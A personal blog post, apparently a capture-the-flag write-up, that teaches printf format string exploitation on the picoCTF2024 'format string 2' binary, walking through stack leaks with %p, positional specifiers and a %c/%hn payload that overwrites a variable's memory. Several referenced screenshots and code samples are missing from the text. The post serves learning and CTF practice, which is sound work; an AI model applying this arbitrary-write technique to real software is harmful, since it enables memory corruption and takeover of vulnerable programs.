Tom Kroll

Learning about programming, reverse engineering, binary exploitation, and everything else I can about cybersecurity


Format String Vulnerability Exploitation

22 Dec 2024

When learning about vulnerabilities in the printf function, I could not find any material which explained the subject in a way that was easy for me to understand. I wanted to learn how to craft a printf payload myself, but the guides I found either relied on scripts or were not well-written. Hopefully this guide will be useful to anyone else learning about this method and help to solidify the concept in my own mind.

printf

The printf function prints a string to the screen, but also uses commands called "format specifiers" to modify the contents of the string. The way that this should be used to print a user's input is something like printf("User input is %s", userInput), which forces the variable userInput to be represented as a string. The function becomes vulnerable when it is used as printf(userInput), which results in any format specifiers the user entered being called. Compiling code written like this should result in a warning such as this one:

The following format specifiers are useful for exploiting this vulnerability:

%d - prints a value from the stack in decimal format
%x - prints a value from the stack in hexadecimal format
%p - also prints in hexadecimal, but appears as a pointer beginning with 0x
%s - uses stack value as a pointer to print a string from memory
%ic - prints i number of characters (e.g., %100c will print 100 blank characters)

The format specifiers below are all variants of %n for different data sizes. The %n format specifier writes an integer value representing the total number of characters printed before the %n command to the memory address pointed to by %n (this will be explained in more detail later).
%lln - 8 bytes
%n - 4 bytes
%hn - 2 bytes
%hhn - 1 byte. In this context, one byte is one character such as A, a hexadecimal value such as 0x41, or a decimal value such as 65.

Example

For this example, I will be using the picoCTF2024 challenge "format string 2". This challenge includes the binary file "vuln" and the source code file "vuln.c". Here is a sample of the code relevant to solving the challenge:

At the top we can see the variable sus is initialized to a value of 0x21737573, however down at line 18 it seems that sus needs to be 0x67616c66 to return a flag. On line 14 we can also see the vulnerability "printf(buf);" we will be taking advantage of. To begin, we will need to locate where the sus variable is in memory. This can be accomplished by using objdump on the "vuln" binary:

Now we now that the variable sus is stored in memory at the location 404060, or 00 00 00 00 00 40 40 60 in its hex form. We can make a note of this and come back to it later.

OK, now let's start gathering some information using format specifiers within the program. Entering a string at the prompt will repeat any string you enter. If %p is entered, we get a hex value in return:

In this case, 0x402075 is a memory location where a string from the program is stored. Here is what happens when %s is used instead:

If the value in this stack frame was not a pointer to a string, it would result in a segmentation fault. This is also the case with %n. Both %s and %n must have valid memory addresses in the stack frame they are referencing or the program will crash.

To get more information from the stack, %p can be spammed to show multiple stack values:

I used a pipe to separate entries instead of a space because when printf encounters a null byte in this particular program it will stop reading. Another way that format specifiers can be used which is essential to exploiting this vulnerability is the symbol $. This will allow us to specify a location on the stack and will also work with other format specifiers, including %n. In the previous example, the eighth value on the stack was 0x9. This can be accessed by including a location along with the %p specifier. By entering %8$p we get:

Now we need to figure out where the string we are entering ends up on the stack. I will enter AAAAAAAA to occupy the entire 8 byte stack frame and then spam %p:

Here we can see our AAAAAAAA string converted to the hex value 0x4141414141414141 in the 14th location. You can also see where the %p entries overflowed into the following stack frames. Let's verify that 14 is the correct location with %14$p:

OK this looks good. The program returned AAAAAAAA and in place of %14$p we got 0x4141414141414141. Now we will put everything together and possibly break your brain. The goal is simple - we need to overwrite the value at memory location 0x00000404060 with the value 0x67616c66. The solution is simple as well, but may not be easily understood at first. Overwriting the memory location with our value is accomplished using a combination of %c and %hn. First, %c is used to return an integer value which after being stored on the stack will become a hex value, as seen in the AAAAAAAA example. Next, that value will be written to memory using %hn and a memory location which we will also include in the string. The 2 byte %hn specifier is used because the full decimal value of 0x67616c66 is too large and will crash the program:

This would result in almost 2 billion blank characters being printed to the screen! By breaking the value into 2 byte chunks, the results are much more manageable:

Now we can begin crafting our payload. We will begin with the smaller number first because any successive values will need to subtract all prior values. So the payload will begin with %26465c%$hn, which includes our first value with the %c specifier and the %hn specifier to write it to memory. We will add a location for %hn later because it is not clear where on the stack our memory address string will be stored. To calculate the second value, we will need to subtract the first value from it because the %hn specifier is returning the number of characters printed and we have already printed 26,465 of them. This makes our second value 27750 - 26465 = 1285, making the second portion of the payload %1285c%$hn.

OK, so far that makes our payload %26465c%$hn%1285c%$hn. Now, we need to add the memory addresses where these values will be written. The first value written will be 26465, which is the decimal representation of the first half of the string that needs to be written. Because we are writing 4 bytes to the address 0x00000404060 and the data is split into 2-byte chunks, these first two bytes will be written to an address two bytes higher at 0x00000404062 and will need to be written in reverse as \x62\x40\x40\x00\x00\x00\x00\x00. I know that the way this address is written is not intuitive, but because of the zeroes in the address and the fact that we can not enter null bytes in this case we are not able to enter an address by hand. I tried numerous ways of doing this and is just not possible without passing the string into the program through something like python. If we were using addresses without zeroes we should be able to get away with writing an address of something like 0xffffffffff404060 as `@@ÿÿÿÿÿ, which would convert to hex and be stored in reverse because of the endianness. The next two bytes of the value will be written to the lower portion of the address at 0x00000404060, making our total payload so far %26465c%$hn%1285c%$hn\x62\x40\x40\x00\x00\x00\x00\x00\x60\x40\x40\x00\x00\x00\x00\x00, which flows out of our stack location of 14 by several frames. Now we need to calculate where those locations are and enter them into the %hn specifiers.

If we start at the location where we know our input string begins and count in 8 byte increments, it is easy to figure out in which stack frame each portion of our string will land. As it stands now, part of the first memory address is in frame 16. After adding the four bytes for stack locations for the %hn specifiers, the first memory address would start mid-frame at location 17 and overflow into 18 which would result in a segmentation fault because %hn would not be using a valid address. Because of this we can add some padding - this can be any character, but I'll just use some As like before:

After filling stack locations into the %hn specifiers and padding the string with AAAAAAA, our first 8 byte memory address will fit perfectly into slot 18 and the second into 19. Now we are ready to go! All we need to do is pass our string into python and out into netcat:

Resulting in a flag!

I hope that this write-up helped you if you are struggling to understand the concept of printf vulnerability exploitation. I struggled for quite a few days trying to piece together information from any article I could find on the subject. Many articles either relied entirely on pwntools scripts or included unnecessary characters in the payload. Researching the subject and writing this article will definitely help to make me a better developer and security professional!


Feedback is welcome and encouraged! Please leave a comment below: